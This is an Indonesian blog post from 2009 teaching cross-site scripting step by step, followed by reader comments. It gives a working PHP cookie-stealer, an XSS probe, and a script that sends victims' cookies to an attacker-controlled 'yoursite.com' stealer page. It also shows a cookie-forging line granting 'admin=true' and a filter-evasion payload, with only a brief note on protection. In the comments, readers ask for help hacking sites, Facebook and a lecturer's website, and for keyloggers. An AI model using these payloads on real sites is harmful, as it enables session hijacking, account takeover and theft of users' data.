Injeksi XSS Ke Dalam Website

9 July 2009
Penulis: S4T4N_CUR53 · Kategori Artikel: Tutorial

Ane mau buat tutor XSS ni

Skalian numpang gabung d sni

Sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2

Step 1

<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

save => stealer.php

Step2
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya


<script>alert(’Testing For XSS Hole’)</script>

Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni

Step 3
<script>
window.location = 'http://yoursite.com/stealer.php?cookie=' + document.cookie;
</script>

step 4
Nah buka xssed.txtnya deh

step 5
Cookie Manipulation:

Ni cuman contoh aja
Terkadang lo bakan melihat cookie yang terlihat seperti:

Admin=false;
Or
Logged_in=true;

Jangan binggung gunain javascriptnya

Javascript:alert(document.cookie);

Keterangan

Ini akan membuat sebuah kotak yang berisi peringatan
bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita
katakan cookie terlihat seperti ini

Logged_in=true, admin=false, fusionid=12312313

Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.

Javascript:void(document.cookie=“admin=true”);

js di atas a/ hak administratif

Perlindungan:
“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo

Agar xss lo aman dr ripper bisa gunain string char code
dapat di inject degan js

/";alert(String.fromCharCode(88,83,83))

translate=>88,83,83 =>XSS

Tags: Attack, Hacking, Inject, XSS

Komentar

28 Komentar Untuk “Injeksi XSS Ke Dalam Website”
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

can pada 19 July 2009 6:06 am

bingung???
gimana caranya sich??? yang detail dong. gua kan masih cupu banget…
S4T4N_CUR53 pada 21 July 2009 7:01 am

coba di pahami dlu mas hehehhe
portdham pada 22 July 2009 1:14 pm

>>>GooD<<<
psycho pada 22 July 2009 8:57 pm

thank’s boss
tapi kok blogspot g bisa,,
tolong jawab disini aja
ovasagaf pada 25 August 2009 9:11 am

kalo artikel kaya gini mah udah bertebaran di internet, yang blum ada tu penjelasan secara detail dengan contoh2 nya,, I’LL be waiting for next post S4T4N_CUR53 .
rwsd pada 29 August 2009 9:13 pm

betul caranya gimana kok tiba² lgsung maen inject aja…
otet_sabit pada 4 September 2009 10:41 am

cara ny sulit ah,, gmna sih mas…
ga tau ah….
ada gak sih cara ng hack situs….
klo ada kirim lewat E-mail aq yach mas….
plis……
aq pngen sprti kmu,, hacker sejati…
heheh……
dewancc pada 27 September 2009 9:31 am

walla… ane sih kagak ngerti apa2 jadi ikutan belajar aja ah…
heri pada 4 October 2009 8:10 pm

bingung gimana cara gunaiinya
cara taunya gimana
cara ngeletakinnya gimana
nulis javascritptnya di mana
dimana nih mas
gimana………….
sarwono pada 5 October 2009 2:01 am

Nice info…
shidik pada 29 October 2009 11:38 pm

Waaah,,,,,!
Tr’nyata Aq bingung,,,,!
chakku03 pada 2 November 2009 2:36 am

klo cegah injeksi xss ama sql gmn boss..??….^^
simuk pada 9 November 2009 11:35 am

tolong jelasin secara detail dongggg??????????????
cobe-cobe pada 13 November 2009 11:57 am

bos klu link di bawah ini untuk apa ?
http://www.binushacker.net/wp-login.php?action=register
yugi_by pada 27 November 2009 12:10 am

lah bikin scrip dimana boz’
maklum gaga tw papa lagi belajar
thx
yugi_by pada 27 November 2009 1:25 am

boz klo punya software Home keylogger tolong kirim dunk
aq dah carii lom dapt
thx ya gann ^_^
yanuar pada 14 February 2010 6:31 pm

mas, aku kasih blom mengerti, knp langsung di injeksi ??
dave pada 23 February 2010 9:32 pm

untuk mengatasinya ada tutornya gak???
Rocky pada 24 February 2010 6:11 pm

Aduh terlambat ,aq sudah terlanjur bawa hp samsung star ku ke servis mana bayar Rp150.000 lagi
Rocky pada 24 February 2010 6:13 pm

maaf ya mas salah comment semestinya di tempat buka kode keamanan segala jenis hp
rams pada 3 March 2010 8:46 pm

ni home keylogger

http://www.kmint21.com/keylogger/
Randdy pada 9 March 2010 12:55 am

mas ini buat hack facebook ya?????
dhimas baru blajar hacker pada 27 March 2010 10:29 pm

wah bgs ni. tu nulis scriptx di notepad aja, trz di save .php kan?

aduh org” d sini pda blum bsa n pda blum donk. mgkn gak di restui jadi hacker ya. hehehe
mr x.. pada 21 April 2010 4:56 am

good…
ngetes pada 23 April 2010 12:09 am

alert(’Testing For XSS Hole’)
Ifan pada 23 April 2010 7:48 pm

Tolong pencerahannya dong buat yg dah master
Aku mau tau gimana cara injeksi script ke web,
soalnya aku kesel banget sama dosen aku yg sombong karna baru membuat website, kuliah 4 sks ngomongin web dia terus,..
kita2 siswa disuruh jadi testingnya..
Gaya nya kayak paling hebat sendiri, SOMBHONG skali dengan kemampuannya.
aku mau coba teting keamanan web dia tapi gak ngerti cara injeksi scriptnya.
TOLONG pencerahannya aku mau kasih pelajaran aja suapaya dia janganterlalu sombong..

yang tutorialnya tolong send ke aku by email di aglinmaeesa@yahoo.com

makasih banyak sebelumnya ^_^
Zonkaas pada 8 June 2010 11:03 pm

Tolong dong master,,aku minta tutorial Cross Site scripting n Google Hacking .. Cz account Gmail-ku kena hack.. Please kirim tutorialnya ke sini ya : uchihazonka@ymail.com ..

Thank’s be4 …
OpECk Corporation pada 9 August 2010 12:20 am

Mas Hack.. penjelasan’y agk lbih detail dan di sertai gambar’y biar lbih mudah praktek’y,.. Ok,!!!